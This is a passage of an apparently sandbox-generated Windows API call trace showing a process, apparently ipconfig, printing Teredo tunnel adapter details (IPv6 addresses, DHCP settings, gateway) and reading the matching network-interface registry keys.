(_FileHandle=1, _Mode=32768) returned 16384 [0124.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCP Enabled. . . . . . . . . . . : No\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0124.135] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x489ae0 [0124.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCP Enabled. . . . . . . . . . . : No\r\n", cchWideChar=-1, lpMultiByteStr=0x489ae0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" DHCP Enabled. . . . . . . . . . . : No\r\n", lpUsedDefaultChar=0x0) returned 44 [0124.135] _fileno (_File=0x7ffe97fce240) returned 1 [0124.135] _write (in: _FileHandle=1, _Buf=0x489ae0*, _MaxCharCount=0x2b | out: _Buf=0x489ae0*) returned 43 [0124.135] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.135] _fileno (_File=0x7ffe97fce240) returned 1 [0124.135] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.135] LocalFree (hMem=0x489ae0) returned 0x0 [0124.135] LocalFree (hMem=0x47bb80) returned 0x0 [0124.135] __iob_func () returned 0x7ffe97fce210 [0124.135] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2789, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x2c [0124.135] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.135] _fileno (_File=0x7ffe97fce240) returned 1 [0124.135] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.135] GetFileType (hFile=0x61c) returned 0x1 [0124.135] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.135] _fileno (_File=0x7ffe97fce240) returned 1 [0124.135] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Autoconfiguration Enabled . . . . : Yes\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0124.135] LocalAlloc (uFlags=0x40, uBytes=0x2d) returned 0x4899e0 [0124.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Autoconfiguration Enabled . . . . : Yes\r\n", cchWideChar=-1, lpMultiByteStr=0x4899e0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Autoconfiguration Enabled . . . . : Yes\r\n", lpUsedDefaultChar=0x0) returned 45 [0124.135] _fileno (_File=0x7ffe97fce240) returned 1 [0124.135] _write (in: _FileHandle=1, _Buf=0x4899e0*, _MaxCharCount=0x2c | out: _Buf=0x4899e0*) returned 44 [0124.136] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.136] _fileno (_File=0x7ffe97fce240) returned 1 [0124.136] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.136] LocalFree (hMem=0x4899e0) returned 0x0 [0124.136] LocalFree (hMem=0x47bb80) returned 0x0 [0124.136] __iob_func () returned 0x7ffe97fce210 [0124.136] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x2e [0124.136] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.136] _fileno (_File=0x7ffe97fce240) returned 1 [0124.136] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.136] GetFileType (hFile=0x61c) returned 0x1 [0124.136] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.136] _fileno (_File=0x7ffe97fce240) returned 1 [0124.136] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.136] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter Local Area Connection* 3:\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0124.136] LocalAlloc (uFlags=0x40, uBytes=0x2f) returned 0x4897e0 [0124.136] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter Local Area Connection* 3:\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x4897e0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nTunnel adapter Local Area Connection* 3:\r\n\r\n", lpUsedDefaultChar=0x0) returned 47 [0124.136] _fileno (_File=0x7ffe97fce240) returned 1 [0124.136] _write (in: _FileHandle=1, _Buf=0x4897e0*, _MaxCharCount=0x2e | out: _Buf=0x4897e0*) returned 46 [0124.136] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.136] _fileno (_File=0x7ffe97fce240) returned 1 [0124.136] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.136] LocalFree (hMem=0x4897e0) returned 0x0 [0124.136] LocalFree (hMem=0x47bb80) returned 0x0 [0124.136] __iob_func () returned 0x7ffe97fce210 [0124.136] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x29 [0124.136] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.136] _fileno (_File=0x7ffe97fce240) returned 1 [0124.136] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.136] GetFileType (hFile=0x61c) returned 0x1 [0124.136] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.137] _fileno (_File=0x7ffe97fce240) returned 1 [0124.137] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.137] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Connection-specific DNS Suffix . : \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0124.137] LocalAlloc (uFlags=0x40, uBytes=0x2a) returned 0x4899e0 [0124.137] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Connection-specific DNS Suffix . : \r\n", cchWideChar=-1, lpMultiByteStr=0x4899e0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Connection-specific DNS Suffix . : \r\n", lpUsedDefaultChar=0x0) returned 42 [0124.137] _fileno (_File=0x7ffe97fce240) returned 1 [0124.137] _write (in: _FileHandle=1, _Buf=0x4899e0*, _MaxCharCount=0x29 | out: _Buf=0x4899e0*) returned 41 [0124.137] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.137] _fileno (_File=0x7ffe97fce240) returned 1 [0124.137] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.137] LocalFree (hMem=0x4899e0) returned 0x0 [0124.137] LocalFree (hMem=0x47bb80) returned 0x0 [0124.137] __iob_func () returned 0x7ffe97fce210 [0124.137] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277f, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x4a [0124.137] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.137] _fileno (_File=0x7ffe97fce240) returned 1 [0124.137] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.137] GetFileType (hFile=0x61c) returned 0x1 [0124.137] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.137] _fileno (_File=0x7ffe97fce240) returned 1 [0124.137] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.137] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0124.137] LocalAlloc (uFlags=0x40, uBytes=0x4b) returned 0x480160 [0124.137] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface\r\n", cchWideChar=-1, lpMultiByteStr=0x480160, cbMultiByte=75, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface\r\n", lpUsedDefaultChar=0x0) returned 75 [0124.137] _fileno (_File=0x7ffe97fce240) returned 1 [0124.137] _write (in: _FileHandle=1, _Buf=0x480160*, _MaxCharCount=0x4a | out: _Buf=0x480160*) returned 74 [0124.138] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.138] _fileno (_File=0x7ffe97fce240) returned 1 [0124.138] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.138] LocalFree (hMem=0x480160) returned 0x0 [0124.138] LocalFree (hMem=0x47bb80) returned 0x0 [0124.138] _vsnwprintf (in: _Buffer=0xcfa30, _BufferCount=0x40, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.138] _vsnwprintf (in: _Buffer=0xcfa36, _BufferCount=0x3a, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.138] _vsnwprintf (in: _Buffer=0xcfa3c, _BufferCount=0x34, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.138] _vsnwprintf (in: _Buffer=0xcfa42, _BufferCount=0x2e, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.138] _vsnwprintf (in: _Buffer=0xcfa48, _BufferCount=0x28, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.138] _vsnwprintf (in: _Buffer=0xcfa4e, _BufferCount=0x22, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.138] _vsnwprintf (in: _Buffer=0xcfa54, _BufferCount=0x1c, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.138] _vsnwprintf (in: _Buffer=0xcfa5a, _BufferCount=0x16, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="E0-") returned 3 [0124.138] __iob_func () returned 0x7ffe97fce210 [0124.138] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2780, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x40 [0124.138] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.138] _fileno (_File=0x7ffe97fce240) returned 1 [0124.141] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.141] GetFileType (hFile=0x61c) returned 0x1 [0124.141] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.141] _fileno (_File=0x7ffe97fce240) returned 1 [0124.141] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.141] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0124.141] LocalAlloc (uFlags=0x40, uBytes=0x41) returned 0x479c70 [0124.142] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n", cchWideChar=-1, lpMultiByteStr=0x479c70, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n", lpUsedDefaultChar=0x0) returned 65 [0124.142] _fileno (_File=0x7ffe97fce240) returned 1 [0124.142] _write (in: _FileHandle=1, _Buf=0x479c70*, _MaxCharCount=0x40 | out: _Buf=0x479c70*) returned 64 [0124.142] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.142] _fileno (_File=0x7ffe97fce240) returned 1 [0124.142] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.142] LocalFree (hMem=0x479c70) returned 0x0 [0124.142] LocalFree (hMem=0x47bb80) returned 0x0 [0124.142] __iob_func () returned 0x7ffe97fce210 [0124.142] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2781, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x2b [0124.142] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.142] _fileno (_File=0x7ffe97fce240) returned 1 [0124.142] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.142] GetFileType (hFile=0x61c) returned 0x1 [0124.142] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.142] _fileno (_File=0x7ffe97fce240) returned 1 [0124.142] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.142] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCP Enabled. . . . . . . . . . . : No\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0124.142] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x4899e0 [0124.142] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCP Enabled. . . . . . . . . . . : No\r\n", cchWideChar=-1, lpMultiByteStr=0x4899e0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" DHCP Enabled. . . . . . . . . . . : No\r\n", lpUsedDefaultChar=0x0) returned 44 [0124.142] _fileno (_File=0x7ffe97fce240) returned 1 [0124.142] _write (in: _FileHandle=1, _Buf=0x4899e0*, _MaxCharCount=0x2b | out: _Buf=0x4899e0*) returned 43 [0124.142] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.142] _fileno (_File=0x7ffe97fce240) returned 1 [0124.142] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.143] LocalFree (hMem=0x4899e0) returned 0x0 [0124.143] LocalFree (hMem=0x47bb80) returned 0x0 [0124.143] __iob_func () returned 0x7ffe97fce210 [0124.143] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2789, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x2c [0124.143] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.143] _fileno (_File=0x7ffe97fce240) returned 1 [0124.143] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.143] GetFileType (hFile=0x61c) returned 0x1 [0124.143] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.143] _fileno (_File=0x7ffe97fce240) returned 1 [0124.143] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.143] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Autoconfiguration Enabled . . . . : Yes\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0124.143] LocalAlloc (uFlags=0x40, uBytes=0x2d) returned 0x489aa0 [0124.143] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Autoconfiguration Enabled . . . . : Yes\r\n", cchWideChar=-1, lpMultiByteStr=0x489aa0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Autoconfiguration Enabled . . . . : Yes\r\n", lpUsedDefaultChar=0x0) returned 45 [0124.143] _fileno (_File=0x7ffe97fce240) returned 1 [0124.143] _write (in: _FileHandle=1, _Buf=0x489aa0*, _MaxCharCount=0x2c | out: _Buf=0x489aa0*) returned 44 [0124.143] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.143] _fileno (_File=0x7ffe97fce240) returned 1 [0124.143] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.143] LocalFree (hMem=0x489aa0) returned 0x0 [0124.143] LocalFree (hMem=0x47bb80) returned 0x0 [0124.143] RtlIpv6AddressToStringExW () returned 0x0 [0124.143] FormatMessageW (in: dwFlags=0x8ff, lpSource=0x0, dwMessageId=0x29ee, dwLanguageId=0x0, lpBuffer=0xcfac0, nSize=0x14, Arguments=0x0 | out: lpBuffer="(Preferred) ") returned 0xc [0124.143] __iob_func () returned 0x7ffe97fce210 [0124.143] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296b, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x58 [0124.143] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.143] _fileno (_File=0x7ffe97fce240) returned 1 [0124.143] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.143] GetFileType (hFile=0x61c) returned 0x1 [0124.143] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.144] _fileno (_File=0x7ffe97fce240) returned 1 [0124.144] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.144] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:c8a:6208:fa6d:7b18(Preferred) \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0124.144] LocalAlloc (uFlags=0x40, uBytes=0x59) returned 0x473890 [0124.144] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:c8a:6208:fa6d:7b18(Preferred) \r\n", cchWideChar=-1, lpMultiByteStr=0x473890, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:c8a:6208:fa6d:7b18(Preferred) \r\n", lpUsedDefaultChar=0x0) returned 89 [0124.144] _fileno (_File=0x7ffe97fce240) returned 1 [0124.144] _write (in: _FileHandle=1, _Buf=0x473890*, _MaxCharCount=0x58 | out: _Buf=0x473890*) returned 88 [0124.144] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.144] _fileno (_File=0x7ffe97fce240) returned 1 [0124.144] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.144] LocalFree (hMem=0x473890) returned 0x0 [0124.144] LocalFree (hMem=0x47bb80) returned 0x0 [0124.144] RtlIpv6AddressToStringExW () returned 0x0 [0124.144] FormatMessageW (in: dwFlags=0x8ff, lpSource=0x0, dwMessageId=0x29ee, dwLanguageId=0x0, lpBuffer=0xcfac0, nSize=0x14, Arguments=0x0 | out: lpBuffer="(Preferred) ") returned 0xc [0124.144] __iob_func () returned 0x7ffe97fce210 [0124.144] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296a, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x4f [0124.144] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.144] _fileno (_File=0x7ffe97fce240) returned 1 [0124.144] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.144] GetFileType (hFile=0x61c) returned 0x1 [0124.144] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.144] _fileno (_File=0x7ffe97fce240) returned 1 [0124.144] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.144] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Link-local IPv6 Address . . . . . : fe80::c8a:6208:fa6d:7b18%4(Preferred) \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0124.144] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x47ff20 [0124.144] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Link-local IPv6 Address . . . . . : fe80::c8a:6208:fa6d:7b18%4(Preferred) \r\n", cchWideChar=-1, lpMultiByteStr=0x47ff20, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Link-local IPv6 Address . . . . . : fe80::c8a:6208:fa6d:7b18%4(Preferred) \r\n", lpUsedDefaultChar=0x0) returned 80 [0124.144] _fileno (_File=0x7ffe97fce240) returned 1 [0124.144] _write (in: _FileHandle=1, _Buf=0x47ff20*, _MaxCharCount=0x4f | out: _Buf=0x47ff20*) returned 79 [0124.145] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.145] _fileno (_File=0x7ffe97fce240) returned 1 [0124.145] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.145] LocalFree (hMem=0x47ff20) returned 0x0 [0124.145] LocalFree (hMem=0x47bb80) returned 0x0 [0124.145] RtlIpv6AddressToStringExW () returned 0x0 [0124.145] __iob_func () returned 0x7ffe97fce210 [0124.145] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278d, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x2b [0124.145] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.145] _fileno (_File=0x7ffe97fce240) returned 1 [0124.145] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.145] GetFileType (hFile=0x61c) returned 0x1 [0124.145] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.145] _fileno (_File=0x7ffe97fce240) returned 1 [0124.145] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.145] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Default Gateway . . . . . . . . . : ::\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0124.145] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x4899e0 [0124.145] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Default Gateway . . . . . . . . . : ::\r\n", cchWideChar=-1, lpMultiByteStr=0x4899e0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Default Gateway . . . . . . . . . : ::\r\n", lpUsedDefaultChar=0x0) returned 44 [0124.145] _fileno (_File=0x7ffe97fce240) returned 1 [0124.145] _write (in: _FileHandle=1, _Buf=0x4899e0*, _MaxCharCount=0x2b | out: _Buf=0x4899e0*) returned 43 [0124.145] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.145] _fileno (_File=0x7ffe97fce240) returned 1 [0124.145] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.145] LocalFree (hMem=0x4899e0) returned 0x0 [0124.145] LocalFree (hMem=0x47bb80) returned 0x0 [0124.145] ConvertInterfaceLuidToGuid (in: InterfaceLuid=0x4844e8, InterfaceGuid=0xcfa20 | out: InterfaceGuid=0xcfa20*(Data1=0xc2998852, Data2=0x8a8b, Data3=0x426b, Data4=([0]=0xaa, [1]=0xb1, [2]=0x88, [3]=0x80, [4]=0xe4, [5]=0x7f, [6]=0x8b, [7]=0x1a))) returned 0x0 [0124.146] ConvertGuidToStringW () returned 0x0 [0124.146] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters\\Interfaces\\{C2998852-8A8B-426B-AAB1-8880E47F8B1A}", ulOptions=0x0, samDesired=0x20019, phkResult=0xcfa08 | out: phkResult=0xcfa08*=0x114) returned 0x0 [0124.146] RegQueryValueExW (in: hKey=0x114, lpValueName="Dhcpv6ClassId", lpReserved=0x0, lpType=0xcfa18, lpData=0xcfb40, lpcbData=0xcfa10*=0x200 | out: lpType=0xcfa18*=0x0, lpData=0xcfb40*=0x4d, lpcbData=0xcfa10*=0x200) returned 0x2 [0124.146] ConvertInterfaceLuidToGuid (in: InterfaceLuid=0x4844e8, InterfaceGuid=0xcfa20 | out: InterfaceGuid=0xcfa20*(Data1=0xc2998852, Data2=0x8a8b, Data3=0x426b, Data4=([0]=0xaa, [1]=0xb1, [2]=0x88, [3]=0x80, [4]=0xe4, [5]=0x7f, [6]=0x8b, [7]=0x1a))) returned 0x0 [0124.146] ConvertGuidToStringW () returned 0x0 [0124.146] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{C2998852-8A8B-426B-AAB1-8880E47F8B1A}", ulOptions=0x0, samDesired=0x20019, phkResult=0xcfa08 | out: phkResult=0xcfa08*=0x0) returned 0x2 [0124.146] __iob_func () returned 0x7ffe97fce210 [0124.146] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2a31, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x32 [0124.146] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.146] _fileno (_File=0x7ffe97fce240) returned 1 [0124.146] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.146] GetFileType (hFile=0x61c) returned 0x1 [0124.146] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.146] _fileno (_File=0x7ffe97fce240) returned 1 [0124.146] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.146] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCPv6 IAID . . . . . . . . . . . : 134217728\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0124.146] LocalAlloc (uFlags=0x40, uBytes=0x33) returned 0x489c60 [0124.146] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCPv6 IAID . . . . . . . . . . . : 134217728\r\n", cchWideChar=-1, lpMultiByteStr=0x489c60, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" DHCPv6 IAID . . . . . . . . . . . : 134217728\r\n", lpUsedDefaultChar=0x0) returned 51 [0124.146] _fileno (_File=0x7ffe97fce240) returned 1 [0124.146] _write (in: _FileHandle=1, _Buf=0x489c60*, _MaxCharCount=0x32 | out: _Buf=0x489c60*) returned 50 [0124.147] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.147] _fileno (_File=0x7ffe97fce240) returned 1 [0124.147] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.147] LocalFree (hMem=0x489c60) returned 0x0 [0124.147] LocalFree (hMem=0x47bb80) returned 0x0 [0124.147] GetProcessHeap () returned 0x470000 [0124.147] RtlAllocateHeap 